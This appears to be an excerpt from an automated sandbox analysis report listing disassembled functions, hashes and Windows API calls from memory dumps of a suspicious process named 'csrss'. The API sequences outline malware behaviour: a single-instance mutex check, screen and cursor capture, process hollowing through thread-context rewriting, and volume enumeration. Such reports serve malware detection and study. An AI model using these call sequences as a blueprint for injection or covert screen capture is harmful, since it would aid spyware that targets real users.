                                                      • Opcode ID: 2a22b1801232c943a5a373c60be4a0da1def4812596029484c738936714c4f65
                                                      • Instruction ID: b0ada6ac11631f4ca299d4fe8a1778fdf27b7ead25b6e95e1cf56abc0e5d32a5
                                                      • Opcode Fuzzy Hash: 2a22b1801232c943a5a373c60be4a0da1def4812596029484c738936714c4f65
                                                      • Instruction Fuzzy Hash: 98125C32B083008BD714CF79D851A1FB3E2BFCC764F15892DE585AB691DA74E8068B96
                                                      APIs
                                                        • Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
                                                        • Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
                                                        • Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
                                                        • Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293
                                                        • Part of subcall function 33D88215: _free.LIBCMT ref: 33D88274
                                                        • Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D88281
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 33D92367
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                                      • String ID:
                                                      • API String ID: 1663032902-0
                                                      • Opcode ID: 2777c31b0fb3f723af3bd72fc4a8315f7de7e342d8d0c78b233d8d9aa78cf82b
                                                      • Instruction ID: 1ddef7162eb7887aef6db8e926f172d24aa42ec795811754647a70ce9ee69f07
                                                      • Opcode Fuzzy Hash: 2777c31b0fb3f723af3bd72fc4a8315f7de7e342d8d0c78b233d8d9aa78cf82b
                                                      • Instruction Fuzzy Hash: 7421BE76D0030AABFB54DE28DC41BEA73ACEB09711F1401AEED01DA940EB34A941CB60
                                                      APIs
                                                        • Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
                                                        • Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
                                                        • Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
                                                        • Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293
                                                      • EnumSystemLocalesW.KERNEL32(33D920C3,00000001,00000000,?,33D84A6C,?,33D926F0,00000000,?,?,?), ref: 33D9200D
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID:
                                                      • API String ID: 1084509184-0
                                                      • Opcode ID: d12d94c34335dd59f4d028e787d4023eebaafabbd481ada90aff968bbc4c78d4
                                                      • Instruction ID: 509d9a195fb14f2923a3d7193750c3e7dcaa3b8e94964d92d27cf53b95b016ef
                                                      • Opcode Fuzzy Hash: d12d94c34335dd59f4d028e787d4023eebaafabbd481ada90aff968bbc4c78d4
                                                      • Instruction Fuzzy Hash: 0A11253B6007059FFB189F39C8906BABB91FF80758B19442CD94B87A40D771B552CB50
                                                      APIs
                                                        • Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
                                                        • Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
                                                        • Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
                                                        • Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,33D922E1,00000000,00000000,?), ref: 33D9256F
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale_abort_free
                                                      • String ID:
                                                      • API String ID: 2692324296-0
                                                      • Opcode ID: 9caccd9db599cab614c5ea57c9644ab52f7b633ef884dd9a489aa13165d66e05
                                                      • Instruction ID: f0b98d3f62e11cced07cdfa687e35015c2c990b66f44c13787962c05e9ce1287
                                                      • Opcode Fuzzy Hash: 9caccd9db599cab614c5ea57c9644ab52f7b633ef884dd9a489aa13165d66e05
                                                      • Instruction Fuzzy Hash: 47F07D3A90021EABF7946A20C815BFA376CEF40B54F444428EC15A3180EB70FE41C6E0
                                                      APIs
                                                        • Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
                                                        • Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
                                                        • Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
                                                        • Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293
                                                      • EnumSystemLocalesW.KERNEL32(33D92313,00000001,?,?,33D84A6C,?,33D926B4,33D84A6C,?,?,?,?,?,33D84A6C,?,?), ref: 33D92082
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID:
                                                      • API String ID: 1084509184-0
                                                      • Opcode ID: 4961388eda54b0da03a6176b25394dec682090bc1c26dbad486ef4303c7f9300
                                                      • Instruction ID: 714c827048204dd56703356fbd5870d72cef9ffae99e025d417d61ad0abb903a
                                                      • Opcode Fuzzy Hash: 4961388eda54b0da03a6176b25394dec682090bc1c26dbad486ef4303c7f9300
                                                      • Instruction Fuzzy Hash: 5EF0463A2003085FF7245F39CC80BAA7B99FF807A8B0A442CE94A8B640D7B1A802C750
                                                      APIs
                                                        • Part of subcall function 33D85888: RtlEnterCriticalSection.NTDLL(?), ref: 33D85897
                                                      • EnumSystemLocalesW.KERNEL32(33D883BE,00000001,33DAEAD0,0000000C), ref: 33D8843C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: db50699392ae5a5b7a5f9313b7437da5e6cf7169ed5d0dfcc37df6e9ffe6e5fa
                                                      • Instruction ID: a341a3c0130f363ec10adeb80ef540e0e79e45628b0d2ac3445c09f939406d6e
                                                      • Opcode Fuzzy Hash: db50699392ae5a5b7a5f9313b7437da5e6cf7169ed5d0dfcc37df6e9ffe6e5fa
                                                      • Instruction Fuzzy Hash: 4FF03773A50208EFD710EF78C885B4977F1EB04321F1089AAE420EF291DA749A968F64
                                                      APIs
                                                        • Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
                                                        • Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
                                                        • Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
                                                        • Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293
                                                      • EnumSystemLocalesW.KERNEL32(33D91EA7,00000001,?,?,?,33D92712,33D84A6C,?,?,?,?,?,33D84A6C,?,?,?), ref: 33D91F87
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID:
                                                      • API String ID: 1084509184-0
                                                      • Opcode ID: 9d8f3851fc826d1f28d4b11213bcb78c7c472a75523d09af0a0821ee64806821
                                                      • Instruction ID: aec2cc948c1dfaef73cbb62254c6f6d547254efe1285400bfa23e83df3f1958f
                                                      • Opcode Fuzzy Hash: 9d8f3851fc826d1f28d4b11213bcb78c7c472a75523d09af0a0821ee64806821
                                                      • Instruction Fuzzy Hash: 92F0E53A7402499BE704AF39C844BAA7F94EFC2765B4A4098EA058BA41C771A942CB60
                                                      APIs
                                                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,33D554FC,33DB4EE0,33DB5A00,33DB4EE0,00000000,33DB4EE0,00000000,33DB4EE0,33DA74AC), ref: 33D4F8E5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: 0506f613ec5e7da38e0cbfbe6296570f6e72c08b55ccd8948428299c5f09cac9
                                                      • Instruction ID: f698879ebe7906d3f6b7828ba79500cadd33cc0569d86dcce8b78634ede07a83
                                                      • Opcode Fuzzy Hash: 0506f613ec5e7da38e0cbfbe6296570f6e72c08b55ccd8948428299c5f09cac9
                                                      • Instruction Fuzzy Hash: 1AD05B31B4421C77D6109695CC0AEAA77DCD705651F000195BA09D72C0E9E15E1087E1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: d0ee7b214a71d2ffc998cf6d553ae11cb55276461d01a7623ff75e595a9df9ce
                                                      • Instruction ID: f5d8a2c3b42112e9612a4ea68ff5f248d555683f93759f852b5c288c4dd6ed5c
                                                      • Opcode Fuzzy Hash: d0ee7b214a71d2ffc998cf6d553ae11cb55276461d01a7623ff75e595a9df9ce
                                                      • Instruction Fuzzy Hash: 81515FB9B00758A7FB108DA4C9537AEE7CE9F42A44F880919DCC1CB6B1C915EB49C362
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: 8d0f64db998f072635cf1eb458ceab3fd2b8b3f2bf3093cc42065a95c29079be
                                                      • Instruction ID: ee4b7960e88ec8874f13d8f3399c7d12977175fc5149fceab504c66ba2ad0349
                                                      • Opcode Fuzzy Hash: 8d0f64db998f072635cf1eb458ceab3fd2b8b3f2bf3093cc42065a95c29079be
                                                      • Instruction Fuzzy Hash: DF51B5B96147849BFB218E3485717EFA7DD9F12A40F8C090ED8C2CBAA9CA05D507C361
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0502e7cedfe668b651b3b048a3ad7082830145b99f9b15599d56faabec3b0d4b
                                                      • Instruction ID: e2b9f9a1b9053c0b325813b4f08563d268292efe723c77146510ed75f1cd07ce
                                                      • Opcode Fuzzy Hash: 0502e7cedfe668b651b3b048a3ad7082830145b99f9b15599d56faabec3b0d4b
                                                      • Instruction Fuzzy Hash: 19B1807911429A8ADF05EF28C4913E63BA1EF6A300F4850B9EC9CCF75AD3358506EB34
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8e62b9aacb0936c466fd3d86c506860f9df5cb35f805f03fa52f98f0b7708fce
                                                      • Instruction ID: 2a81531e62f10bd0b12693351b3772b041fbf7484676a98ea446e7eba311df45
                                                      • Opcode Fuzzy Hash: 8e62b9aacb0936c466fd3d86c506860f9df5cb35f805f03fa52f98f0b7708fce
                                                      • Instruction Fuzzy Hash: 66413AB2C099484EE706AFB0D9561D5BB70EFE7320754928BD1811F4A2DAE0A657CFC3
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 825eaf685df39af488c4f92dce5f5f3bbfb0d7c795e84e93e25e0ed7f58f9936
                                                      • Instruction ID: 3fe0eb43af9a9087c1bf253436a6638bcf434a2f8ca4bdadc0ab5449b7318a13
                                                      • Opcode Fuzzy Hash: 825eaf685df39af488c4f92dce5f5f3bbfb0d7c795e84e93e25e0ed7f58f9936
                                                      • Instruction Fuzzy Hash: 3A3148B28099884AD716AB7099971D1BF60FFE7320754968BC1811E4A2D6E0EA57CFC3
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fedda4d9ca6f521b39dafd7f748c08fa085f514d70900713aa905dabea7deedc
                                                      • Instruction ID: 599035124a91bd05021076a5ccddaf526918dc3f9161cb6d6778b94e2d004f62
                                                      • Opcode Fuzzy Hash: fedda4d9ca6f521b39dafd7f748c08fa085f514d70900713aa905dabea7deedc
                                                      • Instruction Fuzzy Hash: B2618FB9E00709E7FB208D3448917BE7399EF01E85F8C191AE9D2DF6F0D951E9428365
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed33651b7ebf2a743d3dada670637801949ec3100d36cf1df7871ba046a0071c
                                                      • Instruction ID: aa9e02b4fdb7684eb6e7faab441fdc50f68eb087028dc8f2f199594e41569db0
                                                      • Opcode Fuzzy Hash: ed33651b7ebf2a743d3dada670637801949ec3100d36cf1df7871ba046a0071c
                                                      • Instruction Fuzzy Hash: 9F6171B9A4070D97FA348D248890BFE7399EF41E80F940D1AE4C2DF6F0EA51E9428765
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                                                      • String ID: 0sq
                                                      • API String ID: 2719235668-4164572957
                                                      • Opcode ID: 91a16a427c365173df47ed368499b8467df51aa3cc501fba581b0243e2787629
                                                      • Instruction ID: afeed27145745ff518e441fd62ff93fd3dbd35f353b90704634a37f826f35b3c
                                                      • Opcode Fuzzy Hash: 91a16a427c365173df47ed368499b8467df51aa3cc501fba581b0243e2787629
                                                      • Instruction Fuzzy Hash: 71D138B6D05304ABEB14AF78EC8169D77ECEF04B60F44436EE955AF680EB35B50187A0
                                                      APIs
                                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,H#z,00000003), ref: 33D52494
                                                      • ExitProcess.KERNEL32(00000000), ref: 33D524A0
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 33D5251A
                                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 33D52529
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 33D52534
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D5253B
                                                      • GetCurrentProcessId.KERNEL32 ref: 33D52541
                                                      • PathFileExistsW.SHLWAPI(?), ref: 33D52572
                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 33D525D5
                                                      • GetTempFileNameW.KERNEL32(?,33DAC57C,00000000,?), ref: 33D525EF
                                                      • lstrcatW.KERNEL32(?,33DAC588), ref: 33D52601
                                                        • Part of subcall function 33D5C3F1: CreateFileW.KERNEL32(00000080,40000000,00000000,00000000,00000002,00000080,00000000), ref: 33D5C430
                                                      • Sleep.KERNEL32(000001F4), ref: 33D52682
                                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 33D52697
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 33D526A2
                                                      • CloseHandle.KERNEL32(00000000), ref: 33D526A9
                                                      • GetCurrentProcessId.KERNEL32 ref: 33D526AF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExistsExitMutexNameSleeplstrcat
                                                      • String ID: H#z$WDH
                                                      • API String ID: 1507772987-1919101033
                                                      • Opcode ID: e0e0a7827329e18f81a3c849d4740fb96ef1665f8e3f747a5cc5a01c631a9d14
                                                      • Instruction ID: 1729479b80265856c71e9f2f93f50a672d763321d4c608cd3071ae187e751b77
                                                      • Opcode Fuzzy Hash: e0e0a7827329e18f81a3c849d4740fb96ef1665f8e3f747a5cc5a01c631a9d14
                                                      • Instruction Fuzzy Hash: 5251B272E01309AFEF04ABB0DC98EEE33BDAB48250F400155F412E7581DF759E4A8B64
                                                      APIs
                                                      • CreateDCA.GDI32(33DAC878,00000000,00000000,00000000), ref: 33D58E90
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 33D58E9D
                                                        • Part of subcall function 33D59325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 33D59355
                                                      • CreateCompatibleBitmap.GDI32(00000000,?), ref: 33D58F13
                                                      • DeleteObject.GDI32(00000000), ref: 33D58F30
                                                      • SelectObject.GDI32(00000000,00000000), ref: 33D58F51
                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 33D58F89
                                                      • GetCursorInfo.USER32(?), ref: 33D58FA7
                                                      • GetIconInfo.USER32(?,?), ref: 33D58FBD
                                                      • DeleteObject.GDI32(?), ref: 33D58FEC
                                                      • DeleteObject.GDI32(?), ref: 33D58FF9
                                                      • DrawIcon.USER32(00000000,?,?,?), ref: 33D59006
                                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,33DB3198,00000000,00000000,00660046), ref: 33D5903C
                                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 33D59068
                                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 33D590D5
                                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 33D59144
                                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 33D59168
                                                      • DeleteObject.GDI32(00000000), ref: 33D59182
                                                      • GlobalFree.KERNEL32(?), ref: 33D5918D
                                                      • DeleteObject.GDI32(00000000), ref: 33D59241
                                                      • GlobalFree.KERNEL32(?), ref: 33D59248
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Object$Delete$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                      • String ID:
                                                      • API String ID: 2309981249-0
                                                      • Opcode ID: 5776407865096dd2c0e958c6e52d48285f1964831b8b4ceeff6ce5d59bcd438d
                                                      • Instruction ID: 10dcb18ba7ac87b02b385e8280f7aba3b57aebb775bde369c93d6504d3d033bf
                                                      • Opcode Fuzzy Hash: 5776407865096dd2c0e958c6e52d48285f1964831b8b4ceeff6ce5d59bcd438d
                                                      • Instruction Fuzzy Hash: 73C15D76508344AFE720DF24C848B6BBBE9FF88750F44481DF59AE3650DB31A915CB62
                                                      APIs
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 33D58217
                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 33D5822F
                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 33D58245
                                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 33D5826B
                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 33D582ED
                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 33D58301
                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 33D58341
                                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 33D5840B
                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 33D58428
                                                      • ResumeThread.KERNEL32(?), ref: 33D58435
                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 33D5844C
                                                      • GetCurrentProcess.KERNEL32(?), ref: 33D58457
                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 33D58472
                                                      • GetLastError.KERNEL32 ref: 33D5847A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Process$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                      • String ID: ntdll
                                                      • API String ID: 3275803005-3337577438
                                                      • Opcode ID: 442e06c4d1069290cdd9320a6e1545a248f862432721dba0094903a475c9bf08
                                                      • Instruction ID: 039c91bed57e4dfa15b61cfd1b4e07d6c0639917817d84e17d66d1a14233d76c
                                                      • Opcode Fuzzy Hash: 442e06c4d1069290cdd9320a6e1545a248f862432721dba0094903a475c9bf08
                                                      • Instruction Fuzzy Hash: A8A18DB2604304EFEB109F64CC85B6ABBE8FF48746F444929FA45E6191E770E805CFA5
                                                      APIs
                                                      • lstrlenW.KERNEL32(?), ref: 33D5C036
                                                      • lstrlenW.KERNEL32(?), ref: 33D5C067
                                                      • FindFirstVolumeW.KERNEL32(?,00000104), ref: 33D5C0A2
                                                      • GetLastError.KERNEL32 ref: 33D5C0B5
                                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 33D5C0F9
                                                      • lstrcmpW.KERNEL32(?,?), ref: 33D5C114
                                                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 33D5C12C
                                                      • FindVolumeClose.KERNEL32(?), ref: 33D5C15B
                                                      • GetLastError.KERNEL32 ref: 33D5C173
                                                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 33D5C1A0
                                                      • lstrcatW.KERNEL32(?,?), ref: 33D5C1B9
                                                      • lstrcpyW.KERNEL32(?,?), ref: 33D5C1C8
                                                      • GetLastError.KERNEL32 ref: 33D5C1D0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuerylstrcatlstrcmplstrcpy
                                                      • String ID: ?
                                                      • API String ID: 1756451316-1684325040
                                                      • Opcode ID: f8c5cf3a45c6142aef69b11d9bfbb7c1642fdf9fa0686160fd5b889f3276d007
                                                      • Instruction ID: 5e3a9c6f18ba925d6683cf9802662db6b96699e2f12694dafd2f66d5a959972e
                                                      • Opcode Fuzzy Hash: f8c5cf3a45c6142aef69b11d9bfbb7c1642fdf9fa0686160fd5b889f3276d007
                                                      • Instruction Fuzzy Hash: 3F417F76504305ABEB10EF64D88899BB7ECFB48754F44092AF585E3160EB71C54DCBE2
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free$Info
                                                      • String ID:
                                                      • API String ID: 2509303402-0
                                                      • Opcode ID: 44d1a28a632ec6abb2b7b8d872ad4d572e4136a99c2284a60e4f0d04866632b2
                                                      • Instruction ID: 0eafcb38e357275e1a0fbbb0cde2c76aa4db513ac024a8db98cc4814a00810d0
                                                      • Opcode Fuzzy Hash: 44d1a28a632ec6abb2b7b8d872ad4d572e4136a99c2284a60e4f0d04866632b2
                                                      • Instruction Fuzzy Hash: 90B1DEB5D003099FDB11CFA9C880BEEBBF5FF08711F444169E694AB641DB76A941CBA0
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 33D9130A
                                                        • Part of subcall function 33D90502: _free.LIBCMT ref: 33D9051F
                                                        • Part of subcall function 33D90502: _free.LIBCMT ref: 33D90531
                                                        • Part of subcall function 33D90502: _free.LIBCMT ref: 33D90543
                                                        • Part of subcall function 33D90502: _free.LIBCMT ref: 33D90555
                                                        • Part of subcall function 33D90502: _free.LIBCMT ref: 33D90567
                                                        • Part of subcall function 33D90502: _free.LIBCMT ref: 33D90579
                                                        • Part of subcall function 33D90502: _free.LIBCMT ref: 33D9058B
                                                        • Part of subcall function 33D90502: _free.LIBCMT ref: 33D9059D
                                                        • Part of subcall function 33D90502: _free.LIBCMT ref: 33D905AF
                                                        • Part of subcall function 33D90502: _free.LIBCMT ref: 33D905C1
                                                        • Part of subcall function 33D90502: _free.LIBCMT ref: 33D905D3
                                                        • Part of subcall function 33D90502: _free.LIBCMT ref: 33D905E5
                                                        • Part of subcall function 33D90502: _free.LIBCMT ref: 33D905F7
                                                      • _free.LIBCMT ref: 33D912FF
                                                        • Part of subcall function 33D86782: HeapFree.KERNEL32(00000000,00000000), ref: 33D86798
                                                        • Part of subcall function 33D86782: GetLastError.KERNEL32(?,?,33D90C6F,?,00000000,?,00000000,?,33D90F13,?,00000007,?,?,33D9145E,?,?), ref: 33D867AA
                                                      • _free.LIBCMT ref: 33D91321
                                                      • _free.LIBCMT ref: 33D91336
                                                      • _free.LIBCMT ref: 33D91341
                                                      • _free.LIBCMT ref: 33D91363
                                                      • _free.LIBCMT ref: 33D91376
                                                      • _free.LIBCMT ref: 33D91384
                                                      • _free.LIBCMT ref: 33D9138F
                                                      • _free.LIBCMT ref: 33D913C7
                                                      • _free.LIBCMT ref: 33D913CE
                                                      • _free.LIBCMT ref: 33D913EB
                                                      • _free.LIBCMT ref: 33D91403
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: a51e2d1c0c33d26b9dbd96af6b3d708ec868808c7a76008e082d0c66d8eeb561
                                                      • Instruction ID: 1e437b4b357aa5b76448533d706ab04dd55f1633d7fc5f0e7c6d54d06cba1144
                                                      • Opcode Fuzzy Hash: a51e2d1c0c33d26b9dbd96af6b3d708ec868808c7a76008e082d0c66d8eeb561
                                                      • Instruction Fuzzy Hash: 8C315C75E003059FFB118A3ADC41B9A73F8EF047A2F548619E469DAD90DA31BD408BA4
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?), ref: 33D7A892
                                                      • GetLastError.KERNEL32 ref: 33D7A89F
                                                      • __dosmaperr.LIBCMT ref: 33D7A8A6
